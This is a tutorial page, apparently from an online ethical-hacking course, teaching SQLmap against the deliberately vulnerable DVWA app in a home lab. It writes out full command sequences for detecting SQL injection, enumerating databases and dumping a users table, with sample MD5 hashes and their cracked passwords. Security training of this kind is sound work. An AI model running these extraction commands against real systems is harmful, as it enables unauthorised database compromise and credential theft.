📰 Originally published on SecurityElites — the canonical, fully-updated version of this article.
← KALI LINUX COURSE HUB
DAY 7 OF 180
TOOL: SQLMAP Tutorial
🔐
Authorised targets only. All SQLmap commands target DVWA in your own isolated home lab. SQLmap generates high-volume HTTP traffic clearly visible in server logs and IDS. Never run it against systems you don’t own or lack explicit written authorisation to test. Lab: Ethical Hacking Lab Setup.
180-DAY KALI LINUX COURSE
Day 7 / 180 — 3.9%
✅ D1:Nmap
✅ D2:Netcat
✅ D3:Gobuster
✅ D4:Hydra
✅ D5:John
✅ D6:Nikto
▶ D7:SQLmap
D8:Wireshark
D9–180:···
Day 6 (Nikto) flagged a potential SQL injection endpoint. Day 7 teaches you to confirm it and pull every credential, every table, and every piece of data from the database in minutes. SQLmap automates what would take hours of manual UNION payload crafting — and on a confirmed-vulnerable DVWA endpoint, a single three-command sequence goes from zero to a full credential dump in under 90 seconds. Understanding what it is doing beneath the surface is what separates a professional who can adapt when automation fails from one who is lost without it, thats exactly what we will learn today in SQLMAP tutorial
Day 7 covers SQLmap Tutorial completely — installation, basic URL scanning, the full DVWA walkthrough, using Burp Suite request files (the professional method), every important flag, POST form testing, and the command patterns you will use in every authorised web application assessment.
📋 What You’ll Master in Day 7
What Is SQLmap & How It Works
SQLmap is an open-source automated SQL injection detection and exploitation tool. It works by sending crafted HTTP requests to a target parameter, analysing the database’s response behaviour to determine whether injection is possible, then systematically extracting the database schema and data using the confirmed injection channel.
It detects five injection types automatically: boolean-based blind (true/false responses differ), time-based blind (delays reveal data bit by bit), error-based (database errors leak data), UNION query (appends SELECT to extract data), and stacked queries (semicolon-separated statement injection). It supports MySQL, PostgreSQL, MSSQL, Oracle, SQLite, and 20+ other database systems.
📚 Manual first, always. The professional workflow is: (1) confirm injection manually with a single quote and a boolean condition in Burp Repeater, (2) use SQLmap for systematic extraction. Manual first prevents false positives. See: SQL Injection Tutorial Step-by-Step and DVWA Day 4: SQL Injection.
Install & Verify SQLmap on Kali Linux
Pre-installed on Kali Linux — verify:
sqlmap –version
1.8.#stable — https://sqlmap.org
Update to latest version: sqlmap –update
Install if missing: sudo apt install sqlmap -y
View all options: sqlmap -hh # full help (vs -h for short help)
Basic URL Scan — Your First SQLmap Commands
─── Basic GET parameter scan ────────────────────────────────────
sqlmap -u “http://192.168.56.101/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit” \
–cookie=“PHPSESSID=abc123; security=low” –batch
SQLmap tests the ‘id’ parameter and reports injection type found
─── List all databases ────────────────────────────────────────── sqlmap -u “…?id=1&Submit=Submit” –cookie=“…” –dbs –batch
[] available databases [2]: [] dvwa [*] information_schema
Full DVWA Walkthrough — Zero to Credential Dump
The complete four-command sequence that takes you from detecting an injection to extracting usernames and password hashes. All commands target DVWA in your authorised home lab.
securityelites.com
Kali Linux — SQLmap Full DVWA Extraction (Authorised Home Lab)
STEP 1: Enumerate databases
└─$ sqlmap -r dvwa_sqli.txt –dbs –batch
[] dvwa
[] information_schema
STEP 2: List tables in dvwa
└─$ sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch
[] guestbook
[] users
STEP 3: Dump users table
└─$ sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch
+—-+——-+———————————-+
| id | user | password (MD5) |
+—-+——-+———————————-+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordo | e99a18c428cb38d5f260853678922e03 |
| 3 | pablo | 0d107d09f5bbe40cade3de5c71e9e9b7 |
+—-+——-+———————————-+
→ Crack with John the Ripper (Day 5): admin=password, gordo=abc123, pablo=letmein
SQLmap full DVWA extraction using -r Burp request file — three commands in sequence: –dbs (discover databases), -D dvwa –tables (list tables), -D dvwa -T users –dump (extract all rows). Result: three usernames and MD5 password hashes extracted in under 90 seconds. The hashes feed directly into John the Ripper (Day 5) for offline cracking. This is the complete database compromise path in an authorised lab assessment.
─── Complete 4-command extraction sequence ──────────────────────
1. Detect injection + enumerate databases sqlmap -r dvwa_sqli.txt –dbs –batch
2. List tables in target database sqlmap -r dvwa_sqli.txt -D dvwa –tables –batch
3. List columns in users table sqlmap -r dvwa_sqli.txt -D dvwa -T users –columns –batch
4. Dump the entire users table sqlmap -r dvwa_sqli.txt -D dvwa -T users –dump –batch
Burp Suite Request File (-r) — The Professional Method
📖 Read the complete guide on SecurityElites
This article continues with deeper technical detail, screenshots, code samples, and an interactive lab walk-through. Read the full article on SecurityElites →
This article was originally written and published by the SecurityElites team. For more cybersecurity tutorials, ethical hacking guides, and CTF walk-throughs, visit SecurityElites.
Top comments (0)